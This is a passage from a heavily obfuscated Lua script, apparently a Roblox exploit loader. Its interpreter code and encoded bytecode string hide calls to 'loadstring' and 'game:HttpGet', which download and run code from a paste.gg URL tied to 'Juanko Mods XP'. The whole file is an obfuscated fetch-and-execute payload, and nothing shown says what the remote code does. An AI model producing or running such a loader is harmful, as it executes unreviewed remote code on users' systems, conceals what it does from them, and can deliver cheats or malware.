									local ZZZZZZZZZZZU = 191;
									local ZZZZZZZZZZZC = 574;
									local ZZZZZZZZZZZL = 765;
									local ZZZZZZZZZZZD = 0;
									local ZZZZZZZZZZZR = 1;
									local ZZZZZZZZZZZH = 5;
									local ZZZZZZZZZZZS = 5;
									local ZZZZZZZZZZZN = 13;
									local ZZZZZZZZZZZI = 71;
									local ZZZZZZZZZZZO = 92;
									local ZZZZZZZZZZZA = 142;
									local ZZZZZZZZZZZT = 2;
									local ZZZZZZZZZZZE = 411;
									local ZZZZZZZZZZZz = 592;
									local ZZZZZZZZZZZq = 2;
									local ZZZZZZZZZZZj = 9;
									local ZZZZZZZZZZZx = 287;
									local ZZZZZZZZZZZk = 118;
									local ZZZZZZZZZZZv = 212;
									local ZZZZZZZZZZZb = 1;
									local ZZZZZZZZZZZp = 2;
									local ZZZZZZZZZZZy = 7;
									local ZZZZZZZZZZZg = 356;
									local ZZZZZZZZZZZf = 3119;
									local ZZZZZZZZZZZw = 1;
									local ZZZZZZZZZZZm = 1616;
									local ZZZZZZZZZZZu = 0;
									local ZZZZZZZZZZZc = 1;
									local ZZZZZZZZZZZl = 2;
									local ZZZZZZZZZZZd = 59;
									local ZZZZZZZZZZZr = 1464;
									local ZZZZZZZZZZZh = 200;
									local ZZZZZZZZZZZs = 483;
									local ZZZZZZZZZZZn = 3;
									local ZZZZZj = 1;
									local ZZZZZx = 0;
									local ZZZZZk = 0;
									local ZZZZZv = 1;
									local ZZZZZm = 0;
									local ZZZZZu = 1;
									local ZZZZZc = 1;
									local ZZZZZl = 71;
									local ZZZZZd = 92;
									local ZZZZZr = 398;
									local ZZZZZh = 1;
									local ZZZZZs = 458;
									local ZZZZZn = 1582;
									local ZZZZZi = 9;
									local ZZZZZo = 118;
									local ZZZZZa = 425;
									local ZZZZZt = 2;
									local ZZZZZe = 4;
									local ZZZZZ = 356;
									local ZZZZQ = 232;
									local ZZZZJ = 550;
									local ZZZZX = 3119;
									local ZZZZK = 0;
									local ZZZZV = 48;
									local ZZZZB = 1616;
									local ZZZZP = 1;
									local ZZZZY = 0;
									local ZZZZG = 1464;
									local ZZZZF = 200;
									local ZZZZW = 483;
									local ZZZZM = 684;
									local ZZZZU = 3;
									local v113;
									local v114, v115;
									local v116;
									local v117;
									v77[v79[ZZZZU - (ZZZZM - (ZZZZW + ZZZZF))]] = {};
									v71 = v71 + (ZZZZG - (1404 + ZZZZZZZZZZZd)) + 0;
									v79 = v67[v71];
									v77[v79[2 + 0]] = v60[v79[ZZZZZZZZZZZl + 1]];
									v71 = v71 + ZZZZZZZZZZZc + ZZZZY;
									v79 = v67[v71];
									v77[v79[ZZZZP + 1]] = v60[v79[ZZZZB - (1565 + ZZZZV)]];
									v71 = v71 + ZZZZZZZZZZZw + ZZZZK;
									v79 = v67[v71];
									v117 = v79[(ZZZZX - 1979) - (ZZZZJ + ZZZZQ + ZZZZZ)];
									v116 = v77[v79[ZZZZZZZZZZZy - ZZZZZe]];
									v77[v117 + (ZZZZZt - ZZZZZZZZZZZb)] = v116;
									v77[v117] = v116[v79[1555 - (1126 + ZZZZZa)]];
									v71 = v71 + ((ZZZZZZZZZZZv + 194) - (ZZZZZo + ZZZZZZZZZZZx));
									v79 = v67[v71];
									v77[v79[(ZZZZZi - ZZZZZZZZZZZq) - 5]] = v79[(ZZZZZn - ZZZZZs) - (118 + ZZZZZZZZZZZz + ZZZZZZZZZZZE)];
									v71 = v71 + (ZZZZZZZZZZZT - ZZZZZh);
									v79 = v67[v71];
									v117 = v79[379 - (ZZZZZZZZZZZA + (ZZZZZr - (ZZZZZd + ZZZZZl)))];
									v114, v115 = v70(v77[v117](v13(v77, v117 + ZZZZZc, v79[ZZZZZZZZZZZN - (ZZZZZZZZZZZS + ZZZZZZZZZZZH)])));
									v72 = (v115 + v117) - ((ZZZZZu - 0) + ZZZZZm);
									v113 = (ZZZZZZZZZZZL - (ZZZZZZZZZZZC + ZZZZZZZZZZZU)) + 0;
									for v144 = v117, v72 do
										local ZZZZZZZZZZZG = true;
										local ZZZZZZZZZZZF = 424;
										local ZZZZZZZZZZZW = 553;
										local ZZZZZZZZZZZM = 977;
										local ZZZZZg = true;
										local ZZZZZf = 553;
										local ZZZZZw = 977;
										local v145 = ZZZZZw - (ZZZZZf + ZZZZZZZZZZZF);
										while ZZZZZg do
											local ZZZZZZZZZZZY = 297;
											local ZZZZZp = 0;
											local ZZZZZy = 765;
											if (v145 == ((ZZZZZy - (468 + ZZZZZZZZZZZY)) - ZZZZZp)) then
												local ZZZZZZZZZZZP = 1;
												local ZZZZZb = 0;
												v113 = v113 + ZZZZZZZZZZZP + ZZZZZb;
												v77[v144] = v114[v113];
												break;
											end
										end
									end
									v71 = v71 + ZZZZZZZZZZZB + 0;
									v79 = v67[v71];
									v117 = v79[2 + ZZZZZZZZZZZV];
									v77[v117] = v77[v117](v13(v77, v117 + ZZZZZZZZZZZK + ZZZZZZZZZZZX, v72));
									v71 = v71 + ZZZZZv + ZZZZZk;
									v79 = v67[v71];
									v77[v79[ZZZZZZZZZZZZ + ZZZZZx + ZZZZZZZZZZZZt]]();
									v71 = v71 + (ZZZZZj - ZZZZZZZZZZZZo);
									v79 = v67[v71];
									do
										return;
									end
								end
							else
								local ZZZZZZZZZZZZn = 2;
								local ZZZZZZZZZZZZi = 4;
								local ZZZZZq = 4;
								if (v80 == (ZZZZZq - ZZZZZZZZZZZZn)) then
									local ZZZZZT = 334;
									local ZZZZZE = 3;
									local ZZZZZz = 5;
									v77[v79[ZZZZZz - ZZZZZE]] = v60[v79[6 - (565 - (ZZZZZT + 228))]];
								else
									local ZZZZZZZZZZZZh = 1;
									local ZZZZZZZZZZZZs = 1;
									local ZZZZZA = 2;
									v77[v79[(ZZZZZA - ZZZZZZZZZZZZs) + ZZZZZZZZZZZZh]] = {};
								end
							end
						else
							local ZZZZZZZZZZZZd = 24;
							local ZZZZZZZZZZZZr = 713;
							local ZZZZZS = 19;
							local ZZZZZN = 24;
							local ZZZZZI = 3932;
							local ZZZZZO = 713;
							if ((ZZZZZO <= 847) and (ZZZZZI == 3932) and (v80 <= (ZZZZZN - ZZZZZS))) then
								local ZZZZZR = 514;
								local ZZZZZH = 239;
								if (v80 == (757 - (ZZZZZH + ZZZZZR))) then
									local ZZZZZZZZZZZZc = true;
									local ZZZZZZZZZZZZl = 0;
									local ZZZZZD = 0;
									local v136 = ZZZZZD + 0;
									local v137;
									local v138;
									while ZZZZZZZZZZZZc do
										local ZZZZZZZZZZZZk = 0;
										local ZZZZZZZZZZZZv = 2882;
										local ZZZZZZZZZZZZf = 46;
										local ZZZZZZZZZZZZw = 1959;
										local ZZZZZZZZZZZZm = 2785;
										local ZZZZZZZZZZZZu = 873;
										local ZZZZZM = 0;
										if (v136 == (ZZZZZZZZZZZZu - ((ZZZZZZZZZZZZm - ZZZZZZZZZZZZw) + ZZZZZZZZZZZZf))) then
											local ZZZZZZZZZZZZb = 8;
											local ZZZZZZZZZZZZp = 7;
											local ZZZZZZZZZZZZy = 532;
											local ZZZZZZZZZZZZg = 797;
											local ZZZZZU = 7;
											local ZZZZZC = 797;
											local ZZZZZL = 1330;
											v77[v137 + (ZZZZZL - (ZZZZZC + ZZZZZZZZZZZZy))] = v138;
											v77[v137] = v138[v79[(ZZZZZU + 5) - ZZZZZZZZZZZZb]];
											break;
										end
										if ((2882 == ZZZZZZZZZZZZv) and (v136 == (ZZZZZZZZZZZZk + (ZZZZZM - 0)))) then
											local ZZZZZZZZZZZZT = 0;
											local ZZZZZZZZZZZZE = 0;
											local ZZZZZZZZZZZZz = 1;
											local ZZZZZZZZZZZZq = 58;
											local ZZZZZZZZZZZZj = 443;
											local ZZZZZZZZZZZZx = 0;
											local ZZZZZG = 0;
											local ZZZZZF = 1;
											local ZZZZZW = 58;
											v137 = v79[2 + ZZZZZZZZZZZZx];
											v138 = v77[v79[ZZZZZZZZZZZZj - (382 + ZZZZZW)]];
											v136 = ZZZZZF + (ZZZZZZZZZZZZE - ZZZZZG);
										end
									end
								else
									local ZZZZZZZZZZZZA = 2;
									local ZZZZZY = 2;
									v77[v79[(ZZZZZY + 2) - ZZZZZZZZZZZZA]]();
								end
							else
								local ZZZZZZZZZZZZS = 3521;
								local ZZZZZZZZZZZZN = 2029;
								local ZZZZZZZZZZZZI = 254;
								local ZZZZZZZZZZZZO = 373;
								local ZZZZZK = 3521;
								local ZZZZZV = 254;
								local ZZZZZB = 373;
								local ZZZZZP = 1208;
								if ((v80 <= (ZZZZZP - (ZZZZZB + (1678 - (ZZZZZV + 595))))) or (ZZZZZZZZZZZZN >= ZZZZZK)) then
									do
										return;
									end
								else
									local ZZZZZZZZZZZZH = 738;
									local ZZZZZX = 738;
									if (v80 == (ZZZZZX - (476 + 255))) then
										local ZZZZZZZZZZZZC = 71;
										local ZZZZZZZZZZZZL = 55;
										local ZZZZZZZZZZZZD = 369;
										local ZZZZZZZZZZZZR = 1132;
										local ZZZZZJ = 1132;
										v77[v79[ZZZZZJ - (ZZZZZZZZZZZZD + 761)]] = v79[(128 - (ZZZZZZZZZZZZL + ZZZZZZZZZZZZC)) + 1];
									else
										local ZZZZZZZZZZZZW = 0;
										local ZZZZZZZZZZZZM = 0;
										local ZZZZZZZZZZZZU = 238;
										local ZZZZZZt = 0;
										local ZZZZZZe = 0;
										local ZZZZZZ = 141;
										local ZZZZZQ = 238;
										local v153 = v79[(ZZZZZQ - (ZZZZZZ + 95)) - ZZZZZZe];
										v77[v153] = v77[v153](v13(v77, v153 + (1 - ZZZZZZt), v72));
									end
								end
							end
						end
						v71 = v71 + (ZZZZZZa - (ZZZZZZZZZZZZF + ZZZZZZZZZZZZG));
						break;
					end
				end
			end
		end;
	end
	return v29(v28(), {}, v17)(...);
end
return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403713Q00682Q7470733A2Q2F70617374652E2Q672F702F4A75616E6B6F2532304D6F647325323058502F63373161623134622Q3565623430633139373Q3163613733653031643531322F66696C65732F333239303337392Q36393366343637652Q38622Q3136313038343564623132302F72617700094Q00017Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00", v9(), ...);
